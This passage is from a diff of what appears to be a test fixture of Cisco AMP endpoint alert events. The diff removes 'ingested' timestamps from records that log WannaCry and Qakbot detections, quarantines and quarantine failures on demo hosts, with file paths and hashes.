"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3375,7 +3335,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376900241Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3455,7 +3414,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376901205Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3537,7 +3495,6 @@ ], "code": "2164260880", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376902174Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 @@ -3611,7 +3568,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376903249Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 2 @@ -3701,7 +3657,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376904207Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 @@ -3783,7 +3738,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376905196Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 2 @@ -3871,7 +3825,6 @@ ], "code": "553648143", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376906211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 @@ -3947,7 +3900,6 @@ ], "code": "2164260880", "id": "6419239055241773000", - "ingested": "2022-02-02T05:53:05.376907180Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -4025,7 +3977,6 @@ ], "code": "1090519054", "id": "6419239055241773000", - "ingested": "2022-02-02T05:53:05.376908161Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -4118,7 +4069,6 @@ ], "code": "553648143", "id": "6419239050946806000", - "ingested": "2022-02-02T05:53:05.376909126Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -4194,7 +4144,6 @@ ], "code": "2164260880", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376910259Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4270,7 +4219,6 @@ ], "code": "2164260880", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376911239Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4344,7 +4292,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376912200Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4430,7 +4377,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376913166Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4516,7 +4462,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376914137Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4602,7 +4547,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376915385Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -4688,7 +4632,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376916398Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 